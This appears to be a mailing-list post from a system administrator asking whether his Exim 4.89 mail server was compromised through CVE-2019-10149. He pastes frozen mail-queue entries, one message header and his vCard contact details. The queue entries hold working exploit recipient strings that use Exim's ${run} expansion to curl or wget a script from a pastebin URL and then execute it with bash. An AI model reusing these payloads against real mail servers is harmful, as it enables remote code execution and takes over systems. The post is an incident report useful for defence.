Hi,
My mail system ha been hacked ? CVE-2019-10149 ?
***
Exim version
***
exim --version
Exim version 4.89 #1 built 28-May-2019 20:13:55
aptitude show exim4-config
Paquet : exim4-config
Version : 4.89-2+deb9u4
***
And i have this on my mailqueue :
***
19h 679 1hdvRz-0006wq-0C <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost
19h 679 1hdvS6-0006xB-Mg <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-O\x20\x2Ftmp\x2Fbaby\x22}}@localhost
19h 621 1hdvSF-0006xf-MM <> *** frozen ***
${run{\x2Fbin\x2Fsh\t-c\t\x22bash\x20\x2Ftmp\x2Fbaby\x22}}@localhost
***
Header of one mail :
***
1hdvRz-0006wq-0C-H
Debian-exim 109 113
<>
1561030915 0
-helo_name localhost
-host_address X.X.X.X.43366
-interface_address X.X.X.X.587
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1561030915
-host_lookup_failed
XX
1
${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost
284P Received: from [X.X.X.X] (helo=localhost)
by mail.name.local with smtp (Exim 4.89)
id 1hdvRz-0006wq-0C
for
${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost;
Thu, 20 Jun 2019 13:41:55 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31
Benoît
begin:vcard
fn;quoted-printable:Beno=C3=AEt PELISSIER
n;quoted-printable:PELISSIER;Beno=C3=AEt
org;quoted-printable:LAN2NET - l'informatique fiable sous Linux + logiciels libres;membre du r=C3=A9seau "Alliance-Libre"
adr;quoted-printable;dom:12 avenue Jules Verne;;Les Espaces Jules Verne, b=C3=A2timent A;SAINT-SEBASTIEN SUR LOIRE;;44230
email;internet:bpelissier@???
title;quoted-printable:Technicien syst=C3=A8me & r=C3=A9seau
tel;work:02 85 52 65 37
tel;cell:06 86 03 60 26
url:
http://www.lan2net.fr
version:2.1
end:vcard